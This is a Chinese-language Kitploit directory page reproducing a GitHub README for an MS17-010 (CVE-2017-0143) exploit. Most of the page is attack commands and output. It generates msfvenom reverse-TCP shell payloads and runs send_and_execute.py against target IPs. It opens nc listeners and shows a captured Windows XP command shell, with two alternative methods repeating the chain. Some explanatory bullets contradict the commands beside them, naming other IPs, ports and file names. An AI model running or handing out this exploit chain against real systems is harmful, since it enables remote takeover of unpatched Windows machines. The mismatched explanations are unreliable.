Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
MS17-010_CVE-2017-0143 — MS17-010_CVE-2017-0143 | Kitploit
工具/GitHubGitHub/h3x0v3rl0rd/ms17-010_cve-2017-0143
Payload生成漏洞分析漏洞利用Shellcode渗透测试远程访问工具
GitHubh3x0v3rl0rd/ms17-010_cve-2017-0143

MS17-010_CVE-2017-0143

MS17-010_CVE-2017-0143

查看仓库
401431年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MS17-010

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2017-0143

Docker

使用 msfvenom 生成 Payload:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe
  • -p windows/shell_reverse_tcp:指定 payload(一个针对 Windows 的反向 TCP shell)。
  • LHOST=10.10.14.4:攻击者的 IP 地址(目标将回连的地址)。
  • LPORT=443:攻击者机器上监听连接的端口。
  • -f exe:将 payload 输出为可执行文件。
  • -a x86:指定架构(32 位)。
  • -o rev.exe:将 payload 保存为 rev.exe。

设置 Docker 容器:

  • 为什么使用 Docker?
    • Docker 为运行漏洞利用提供了一致且隔离的环境。
    • 它避免了依赖问题(例如,Python 版本冲突、缺少库)。

设置 Docker 的步骤:

root@kitploit:~
sudo apt-get install docker.io

创建文件夹结构:

root@kitploit:~
mkdir exploit
cd exploit
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
  • Dockerfile:包含构建 Docker 容器的指令。
  • requirements.txt:列出 Python 依赖(例如 impacket)。

编写 Dockerfile:

root@kitploit:~
FROM python:2.7-alpine
RUN apk --update --no-cache add \
    git \
    zlib-dev \
    musl-dev \
    libc-dev \
    gcc \
    libffi-dev \
    openssl-dev && \
    rm -rf /var/cache/apk/*

RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txt
  • FROM python:2.7-alpine:使用带有 Python 2.7 的轻量级 Alpine Linux 镜像。
  • RUN apk --update --no-cache add:安装必要的依赖(例如 git、gcc)。
  • COPY rev.exe /opt/cattime:将反向 shell 可执行文件(rev.exe)复制到容器中。
  • RUN pip install -r requirements.txt:安装 Python 依赖(例如 impacket)。

构建 Docker 容器:

root@kitploit:~
sudo docker build -t exploit .

运行容器:

root@kitploit:~
sudo docker run -it exploit /bin/sh

下载并运行漏洞利用:

root@kitploit:~
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
root@kitploit:~
cd MS17-010_CVE-2017-0143
root@kitploit:~
python send_and_execute.py 10.10.10.4 ../ms17-010.exe

反弹 Shell:

root@kitploit:~
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1035
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

旧方法

方法1

root@kitploit:~
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe

创建一个 nc 监听器

root@kitploit:~
nc -nlvp 1337

漏洞利用

root@kitploit:~
python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe

图片

如果遇到类似错误,请按照以下步骤操作:

root@kitploit:~
cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket

现在我们可以运行漏洞利用: 图片

图片

方法2

现在这个漏洞利用是用 python2 编写的,它需要一些库,如 impacket、pycrypto。为此,需要设置虚拟环境,virtualenv 程序可以提供帮助。一旦创建了环境,就可以使用 source 实用程序激活该环境。这里使用 python2 作为解释器,因为在最新的 Kali 中,python3 被设为全局解释器,而我们的漏洞利用是用 python2 编写的。

为什么要使用虚拟环境?你可以查看这个链接。 https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/

root@kitploit:~
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto

图片

图片

root@kitploit:~
python checker.py 10.10.10.4

图片

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe

图片

root@kitploit:~
python send_and_execute.py 10.10.10.4 shell.exe 445 browser

图片

root@kitploit:~
nc -nlvp 4445

图片

下载工具